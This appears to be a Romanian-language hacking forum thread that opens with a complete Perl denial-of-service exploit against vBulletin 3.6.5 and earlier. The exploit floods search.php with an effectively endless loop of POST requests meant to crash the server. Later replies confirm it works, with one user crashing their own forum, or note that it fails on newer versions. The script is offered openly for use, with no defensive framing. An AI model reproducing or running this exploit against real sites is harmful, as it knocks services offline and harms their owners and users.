CODEX Posted October 23, 2008 Report Share Posted October 23, 2008 # VBulletin DoS Exploit# # The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works;) # # important => Make sure that Image Verification in (search.php) is NOT Enabled.# It works on 3.6.5 and prior [all] !##Perl Scriptuse Socket;if (@ARGV < 2) { &usage; }$rand=rand(10);$host = $ARGV[0];$dir = $ARGV[1];$host =~ s/(http:\/\/)//eg;for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++){$user="h4x0r".$rand.$i;$data = "s=&do=process&query=$user&titleonly=0&starteronly =0&exactname=1&replyless=0&replylimit=3&searchdate =1&beforeafter=before&sortby=title&order=descendin g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";$len = length $data;$foo = "POST ".$dir."search.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "|";}print "\n\n";system('ping $host');sub usage {print "\tusage: \n";print "\t$0 \n";print "\tex: $0 127.0.0.1 /forum/\n";print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";exit();};Este un script in perl deci aveti nevoie d eurmatorul sofware.http://www.activestate.com/ActivePerl/ Quote Link to comment Share on other sites More sharing options...
C0nfigurati0n Posted October 25, 2008 Report Share Posted October 25, 2008 Merge Perfect Quote Link to comment Share on other sites More sharing options...
paxnWo Posted October 25, 2008 Report Share Posted October 25, 2008 mi-am picat singur forumul . merge Quote Link to comment Share on other sites More sharing options...
xZu Posted October 25, 2008 Report Share Posted October 25, 2008 mi-am picat singur forumul . merge Doamne fereste. Quote Link to comment Share on other sites More sharing options...
okei Posted February 9, 2009 Report Share Posted February 9, 2009 merge ,mersi frumos Quote Link to comment Share on other sites More sharing options...
kp Posted April 30, 2009 Report Share Posted April 30, 2009 nu merge pe ultima versiune de vBulletin Version 3.8.2 Quote Link to comment Share on other sites More sharing options...
Dyshka Posted May 16, 2009 Report Share Posted May 16, 2009 am incercat si eu pe al meu , si nu a mers ... Quote Link to comment Share on other sites More sharing options...
Cheater Posted May 16, 2009 Report Share Posted May 16, 2009 E exploit de anu trecut normal ca nu mai merge dc pe platformele neupdatate, vechi. Quote Link to comment Share on other sites More sharing options...
Mareshal Posted May 21, 2009 Report Share Posted May 21, 2009 oare pe asta merge ? 3.5.3 Quote Link to comment Share on other sites More sharing options...
blueangelmnx Posted August 17, 2009 Report Share Posted August 17, 2009 bah scz ca invii topicul dar am o prb cand pornesc exploitu se incarca liniile alea si nu se mai opresc...ce drecu astept de 5 minute.. Quote Link to comment Share on other sites More sharing options...
alex_owners Posted November 28, 2009 Report Share Posted November 28, 2009 give me video, plssssss Quote Link to comment Share on other sites More sharing options...